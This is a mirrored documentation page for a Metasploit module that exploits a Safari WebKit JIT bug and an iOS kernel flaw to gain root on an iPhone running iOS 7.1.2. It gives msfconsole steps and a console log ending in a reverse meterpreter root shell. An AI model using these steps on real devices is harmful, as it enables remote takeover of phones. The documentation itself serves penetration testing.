CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/apple_ios/browser/safari_jit.md
Views: 1904

Vulnerable Application

This module exploits a JIT optimization bug in Safari Webkit. This allows us to write shellcode to an RWX memory section in JavaScriptCore and execute it. The shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw, obtains root and disables code signing. Finally we download and execute the meterpreter payload.

This module has been tested against iOS 7.1.2 on an iPhone 4.

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/apple_ios/browser/safari_jit

  3. Do: set lhost [ip]

  4. Do: set srvhost [ip]

  5. Do: run

  6. Browse to the website with a vulnerable device

  7. You should get a root shell.

Options

DEBUG_EXPLOIT

Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and loading of the payload. Defaults to false

Scenarios

iPhone 4 with iOS 7.1.2

msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios